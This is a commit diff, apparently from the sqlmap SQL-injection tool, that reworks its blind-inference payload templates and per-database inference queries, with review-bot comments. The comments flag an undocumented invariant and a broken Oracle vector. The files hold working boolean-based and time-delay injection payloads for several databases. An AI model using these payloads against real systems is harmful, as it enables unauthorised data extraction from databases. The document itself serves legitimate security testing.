Minor code refactoring and finally make exploitation work also on OR boolean-based injections

This commit is contained in:
Bernardo Damele 2010-12-05 11:25:44 +00:00
parent 7a5cd3b35f
commit 41e1b95c6c
3 changed files with 56 additions and 20 deletions


@ -213,9 +213,7 @@ class Agent:
payload = payload.replace("[ORIGVALUE]", origvalue) payload = payload.replace("[ORIGVALUE]", origvalue)
if kb.dbms is not None: if kb.dbms is not None:
# NOTE: ugly hack due to queries.xml's <inference> tag inferenceQuery = queries[kb.dbms].inference.query
# starting with 'AND ' string
inferenceQuery = queries[kb.dbms].inference.query[4:]
payload = payload.replace("[INFERENCE]", inferenceQuery) payload = payload.replace("[INFERENCE]", inferenceQuery)
return payload return payload
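Review bot: Dropping the `[4:]` slice makes the substitution depend on an invariant that is now documented nowhere: every `<inference>` query in queries.xml must be a bare boolean predicate, and the `AND`/`OR` or `CASE WHEN` wrapper must come from the test's `<vector>` in payloads.xml. I would replace the deleted NOTE with `# [INFERENCE] is a bare predicate; the AND/OR or CASE wrapper is supplied by the test's <vector>` above the new `inferenceQuery = queries[kb.dbms].inference.query` line so the next person who adds a DBMS entry does not reintroduce the prefix. Also visible here: when `kb.dbms` is None the `[INFERENCE]` marker is left in the payload verbatim; if that path is reachable for a boolean-based test it would be sent to the target as-is, so a debug log or assertion there seems worthwhile — I cannot tell from this hunk whether callers guarantee `kb.dbms` is set. The enclosing method starts outside the hunk.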


@ -402,6 +402,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<vector>AND [INFERENCE]</vector>
<request> <request>
<payload>AND [RANDNUM]=[RANDNUM]</payload> <payload>AND [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -410,6 +411,40 @@ Formats:
</response> </response>
</test> </test>
<test>
<title>AND boolean-based blind - WHERE clause (MySQL comment)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>#</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>AND boolean-based blind - WHERE clause (Generic comment)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>--</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test> <test>
<title>OR boolean-based blind - WHERE clause</title> <title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype> <stype>1</stype>
@ -417,6 +452,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
</request> </request>
@ -432,6 +468,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>#</comment> <comment>#</comment>
@ -451,6 +488,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>--</comment> <comment>--</comment>
@ -488,7 +526,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -508,7 +546,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -527,7 +565,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -546,7 +584,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -586,7 +624,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -606,7 +644,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -625,7 +663,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -644,7 +682,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
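Review bot: The Oracle `where=3` vector in the `@ -546,7 +584,7` hunk is left syntactically broken: the new side reads `(SELECT (CASE WHEN ([INFERENCE]) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)`, keeping a stray `> %d)` from the old `ASCII(SUBSTR(...)) > %d` form, so after substitution the SQL has an unbalanced parenthesis, an unformatted `%d`, and compares a boolean predicate to an integer. The sibling Oracle vector at `@ -644,7 +682,7` shows the intended shape; the line should be `<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>`. Since the inference query no longer carries its own conjunction, every `<vector>` must now wrap `[INFERENCE]` itself; a grep of the new side for `[INFERENCE]` not preceded by `AND `, `OR ` or `WHEN (` would have caught this one.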


@ -24,7 +24,7 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/> <substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="ORD(MID((%s), %d, 1)) > %d"/>
<banner query="VERSION()"/> <banner query="VERSION()"/>
<current_user query="CURRENT_USER()"/> <current_user query="CURRENT_USER()"/>
<current_db query="DATABASE()"/> <current_db query="DATABASE()"/>
@ -96,7 +96,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>
<current_db query="SELECT CURRENT_DATABASE()"/> <current_db query="SELECT CURRENT_DATABASE()"/>
@ -162,7 +162,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/> <current_user query="SELECT SYSTEM_USER"/>
<current_db query="SELECT DB_NAME()"/> <current_db query="SELECT DB_NAME()"/>
@ -226,7 +226,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/> <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/> <current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/> <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
@ -306,7 +306,7 @@
<timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/> <timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/> <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
<banner query="SELECT SQLITE_VERSION()"/> <banner query="SELECT SQLITE_VERSION()"/>
<current_user/> <current_user/>
<current_db/> <current_db/>
@ -353,7 +353,7 @@
<banner/> <banner/>
<current_user query="SELECT CURRENTUSER()"/> <current_user query="SELECT CURRENTUSER()"/>
<current_db/> <current_db/>
<inference query="AND ASC(MID((%s), %d, 1)) > %d"/> <inference query="ASC(MID((%s), %d, 1)) > %d"/>
<is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/> <is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
<dbs/> <dbs/>
<tables> <tables>
@ -389,7 +389,7 @@
<inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/> <inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/> <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
</users> </users>
<inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/> <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
<is_dba query="CURRENT_USER='SYSDBA'"/> <is_dba query="CURRENT_USER='SYSDBA'"/>
<tables> <tables>
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/> <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@ -432,7 +432,7 @@
<current_db query="SELECT DATABASE() FROM DUAL"/> <current_db query="SELECT DATABASE() FROM DUAL"/>
<order query="ORDER BY %s ASC"/> <order query="ORDER BY %s ASC"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/> <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
<delimiter query=","/> <delimiter query=","/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<users> <users>
@ -473,7 +473,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SUSER_NAME()"/> <current_user query="SELECT SUSER_NAME()"/>
<current_db query="SELECT DB_NAME()"/> <current_db query="SELECT DB_NAME()"/>